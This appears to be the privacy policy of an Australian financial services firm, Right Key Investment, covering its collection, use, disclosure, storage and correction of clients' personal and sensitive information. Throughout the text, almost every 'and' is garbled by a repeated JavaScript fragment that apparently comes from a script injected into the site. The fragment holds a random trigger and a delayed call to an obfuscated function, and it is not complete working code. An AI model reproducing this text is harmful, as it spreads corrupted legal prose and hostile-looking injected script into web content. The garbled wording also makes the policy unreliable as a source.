Privacy Policy

1. Privacy Information
‍‍
Jalia C Pty Ltd, hereafter referred to as Right Key Investment, understandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and the importance you attach to your personal information andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and are committed to protecting your privacy.

Right Key Investment are bound by the National Privacy Principles (NPPs) set out in the Privacy Amendment (Private Sector) Act 2000.

2. What personal information do RIGHT KEY INVESTMENT collect about you?‍

The nature of personal information RIGHT KEY INVESTMENT collect from you will depend on the service(s) you have requested andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and may include (but is not limited to) name, address, date of birth, contact details, income, assets andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and liabilities, account balances, tax andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and financial statements andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and employment details.

RIGHT KEY INVESTMENT obtains most of the information directly from you through the completion of application forms andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and client profiles andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and RIGHT KEY INVESTMENT maintain records of the information in the course of ongoing customer service.

Before RIGHT KEY INVESTMENT are able to arrange financial products RIGHT KEY INVESTMENT are required by law to verify your identity andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and will therefore request andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and copy your personal identification documents. If you choose not to provide the personal information or identification documents that RIGHT KEY INVESTMENT require, RIGHT KEY INVESTMENT may not be able to provide you with the requested service(s).

3. What about sensitive personal information?

‍Some of our services also require RIGHT KEY INVESTMENT to collect sensitive information, including (but not limited to) your racial or ethnic origin, credit records, state of health andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and medical history. Sensitive information is usually needed for applications for death, sickness andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and disability insurance andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and credit products.

Your sensitive information will only be used andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and disclosed for the purposes for which it was provided, unless you agree otherwise or the use or disclosure of this information is allowed by law.

4. How do RIGHT KEY INVESTMENT use your personal information andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and who may RIGHT KEY INVESTMENT disclose it to?

RIGHT KEY INVESTMENT will only use the information you provided for the purpose of providing you with the service(s) you have requested, unless:

You consent to us using that personal information for another purpose;

The other purpose is related to the main purpose andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and you would reasonably expect us to use the personal information for that other purpose; or

It is permitted or required by law; or

RIGHT KEY INVESTMENT reasonably believes it is necessary on health andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and public safety grounds to use the personal information for another purpose.

Depending on the product or service, personal information may be disclosed to:

Other areas within the RIGHT KEY INVESTMENT Group who provide other services;

Service providers andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and specialist advisers to RIGHT KEY INVESTMENT who have been contracted to provide administrative, financial, insurance, research or other services;

Anyone authorised by you in writing, such as a power of attorney; andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and

Courts, tribunals andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and regulatory authorities as authorised by law

Generally, RIGHT KEY INVESTMENT require that organisations outside RIGHT KEY INVESTMENT who handom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andle or obtain personal information as service providers to the group, acknowledge the confidentiality of this information, undertake to respect any individual’s right to privacy andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and comply with the National Privacy Principles andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and this policy.

From time to time, RIGHT KEY INVESTMENT may also use your contact details for marketing communications activities. RIGHT KEY INVESTMENT respects your choice to opt out of these activities. Should you decide you do not wish to receive marketing or promotional material from us at any time, please let us know by sending an e-mail to info@rightkeyinvestment.com

RIGHT KEY INVESTMENT will not adopt as our own, any unique identifiers you may provide to us such as Tax File Numbers, Medicare or other numbers.

5. How do RIGHT KEY INVESTMENT store your personal information?

Whether you interact with us personally, by phone, mail, over the internet, or other electronic medium, safeguarding the privacy of your personal information is one of our key responsibilities. RIGHT KEY INVESTMENT holds personal information in a combination of secure computer storage facilities andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and paper-based files andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and have robust procedures to protect your personal information from misuse, loss, unauthorised access, modification or disclosure.

RIGHT KEY INVESTMENT is required to retain a record of your personal information for a period of seven years. After this period, RIGHT KEY INVESTMENT will remove any details that will identify you or RIGHT KEY INVESTMENT will destroy the records in a secure manner.

6. Can you access your personal information?

‍You have the right to obtain a copy of any personal information RIGHT KEY INVESTMENT hold about you andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and to advise us of any perceived inaccuracy. You will be required to:

Submit your request in writing;

Verify your identity; andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and

Specify the personal information you require

RIGHT KEY INVESTMENT will acknowledge your request within 14 days andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and respond within a reasonable time-frame. RIGHT KEY INVESTMENT may charge a fee to cover the cost of locating, retrieving, reviewing andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and copying any information requested. If the information sought is extensive, RIGHT KEY INVESTMENT will advise the likely cost in advance andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and can help to refine your request if required.

7. How do RIGHT KEY INVESTMENT keep personal information accurate?

RIGHT KEY INVESTMENT endeavours to ensure that your personal information remains accurate andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and up-to-date. RIGHT KEY INVESTMENT acknowledge that your personal information may change frequently with changes of address andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and other personal circumstances. To enable us to keep our records accurate, please notify us by sending an e-mail to info@rightkeyinvestment.com if you believe that any information RIGHT KEY INVESTMENT hold about you is incomplete or out of date andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and RIGHT KEY INVESTMENT will take reasonable steps to correct it.
‍‍
8. Use of Cookies

RIGHT KEY INVESTMENT uses cookies to analyse trends, administer the website, track users’ movements around the website, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and to gather information about our contacts as a whole. To find out more about how we use cookies on our Websites andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and how to manage your cookie preferences please see our Cookie Policy.

9. Changes to this Privacy Statement

From time to time, RIGHT KEY INVESTMENT may vary the company Privacy Statement andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and will publish any changes on the RIGHT KEY INVESTMENT website.

10. What if you have a complaint?

If you consider that any action of RIGHT KEY INVESTMENT breaches this Privacy Policy Statement or the National Privacy Principles or otherwise doesn’t respect your privacy, please send us an e-mail at info@rightkeyinvestment.com

If you are not satisfied with our response to your complaint, you can phone the Privacy Commissioner’s hotline on 1300 363 992.

11. Statistical information disclaimer

The information andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and data contained in various documents, blogs, ebooks andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and other marketing material supplied by RIGHT KEY INVESTMENT have been provided by RIGHT KEY INVESTMENT for general information purposes only. While RIGHT KEY INVESTMENT takes care in the compilation andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and provision of the information andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and data, it does not assume or accept any liability for the accuracy, quality, suitability andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and currency of the information or data, or for any reliance on the information or data.

RIGHT KEY INVESTMENT recommends that users exercise their own care, skill andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and diligence with respect to the use andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and interpretation of the information andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}and data they receive.